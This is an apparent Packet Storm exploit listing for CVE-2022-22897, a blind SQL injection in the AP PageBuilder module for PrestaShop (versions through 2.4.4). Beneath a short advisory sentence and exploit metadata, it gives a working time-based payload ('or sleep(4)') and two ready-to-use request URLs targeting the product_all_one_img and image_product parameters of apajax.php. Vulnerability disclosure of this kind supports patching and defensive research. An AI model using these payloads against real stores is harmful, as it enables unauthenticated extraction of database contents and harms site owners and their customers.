CVE-2022-22897: PrestaShop Ap Pagebuilder 2.4.4 SQL Injection ≈ Packet Storm
A SQL injection vulnerability in the product_all_one_img and image_product parameters of the ApolloTheme AP PageBuilder component through 2.4.4 for PrestaShop allows unauthenticated attackers to exfiltrate database data.
# Exploit Title: AP PAGEBUILDER Prestashop module <= 2.4.4 'product_all_one_img' , 'image_product' Blind SQL Injection
# Date: 24-08-2022
# Exploit Author: Mohamed Ali Hammami
# Vendor Homepage: https://apollotheme.com/
# Software Link: https://apollotheme.com/products/ap-pagebuilder-prestashop-module
# Version: 2.4.4
# Tested on: Windows 10
# CVE: CVE-2022-22897

Parameters: product_all_one_img,image_product

Payload: 1) or sleep(4) #

Exploit:

http://localhost/modules/appagebuilder/apajax.php?rand=1641313272327&leoajax=1&product_all_one_img=1)+or+sleep(4)%23&image_product=0&wishlist_compare=1

http://localhost/modules/appagebuilder/apajax.php?rand=1641313272327&leoajax=1&product_all_one_img=1&image_product=1)+or+sleep(4)%23&wishlist_compare=1